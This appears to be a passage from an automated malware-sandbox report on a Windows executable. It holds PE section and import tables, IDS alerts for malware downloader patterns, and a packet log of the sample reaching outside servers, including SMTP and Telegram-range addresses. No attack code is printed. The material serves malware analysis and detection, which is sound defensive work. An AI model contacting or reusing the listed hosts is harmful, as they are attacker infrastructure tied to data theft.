.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x13778 | 0x13800 | deaf8cf0ab1ab56c5b616d6567464a39 | False | 0.08774038461538461 | data | 3.8891256142087705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab448 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab570 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab698 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab7c0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.05220040222406246
RT_MENU | 0xbbfe8 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xbc038 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xbc138 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xbc668 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xbccf8 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xbd1c8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xbd7c8 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xbde28 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xbe1b0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xbe308 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xbe320 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xbe338 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xbe350 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xbe368 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xbe508 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T15:34:13.196430+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:14.071432+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:14.669336+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:15.196577+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49707 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:20.252908+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49716 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:31.649538+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49728 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:32.446433+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49728 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:33.024873+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:33.540191+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49731 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:36.632789+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49736 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:40.422975+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49742 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:41.510510+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49744 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Sep 25, 2024 15:34:18.986736059 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.988616943 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.988655090 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.124022007 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.124141932 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.124257088 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.124639034 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.129589081 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.130141973 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.134855032 CEST8049713193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.134955883 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.134962082 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.135020971 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.135159969 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.139908075 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.612426043 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.631499052 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.631545067 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.631625891 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.635328054 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.635344028 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.665178061 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.109774113 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.111756086 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.111773968 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.252928972 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.253016949 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.253071070 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.253688097 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.257005930 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.258047104 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.262160063 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.262240887 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.262886047 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.262965918 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.263055086 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.267787933 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.725817919 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.727561951 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.727616072 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.727807045 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.727986097 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.727993965 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.774678946 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.188690901 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.190346003 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.190373898 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.339232922 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.339349031 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.339409113 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.339858055 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.342550039 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.343561888 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.348079920 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.348149061 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.348442078 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.348500967 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.348597050 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.353384972 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.814506054 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.815855980 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.815911055 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.816018105 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.816271067 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.816282988 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.868419886 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:22.293684006 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.325692892 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:22.325731039 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.436657906 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.436748981 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.438249111 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:22.443674088 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:22.668061018 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:22.798058033 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:22.798170090 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:22.800473928 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:22.800522089 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:22.802602053 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:22.802602053 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:22.802635908 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.449409008 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.449668884 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.451430082 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.451452017 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.451706886 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.453175068 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.499394894 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.693469048 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.693636894 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.693742990 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.753400087 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:29.243438959 CEST4970780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:29.553328037 CEST49727587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:29.558243036 CEST58749727208.91.198.143192.168.2.5
                                                                    Sep 25, 2024 15:34:29.558336020 CEST49727587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:31.013031960 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.018217087 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.018311977 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.018636942 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.023416042 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.474561930 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.478653908 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.483485937 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.596568108 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.638556957 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:31.638608932 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:31.638705015 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:31.643544912 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:31.643562078 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:31.649538040 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:32.108644962 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.108732939 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.110960960 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.110974073 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.111248970 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.165219069 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.173873901 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.215409040 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.290801048 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.290908098 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.291034937 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.294621944 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.305228949 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:32.310250044 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:32.405152082 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:32.407718897 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.407785892 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.407855034 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.408134937 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.408149958 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.446433067 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:32.865061998 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.867124081 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.867158890 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.024976015 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.025333881 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.025394917 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.025850058 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.029983997 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.031043053 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.035145998 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.035295010 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.035927057 CEST8049731193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.036071062 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.036124945 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.041173935 CEST8049731193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.498054981 CEST8049731193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.499646902 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.499706984 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.499880075 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.500179052 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.500193119 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.540190935 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.135346889 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.137427092 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.137464046 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.461196899 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.461596966 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.461764097 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.462080002 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.467442036 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.472245932 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:34.472323895 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.472502947 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.477282047 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:34.946387053 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:34.947911024 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.947972059 CEST44349734188.114.97.3192.168.2.5
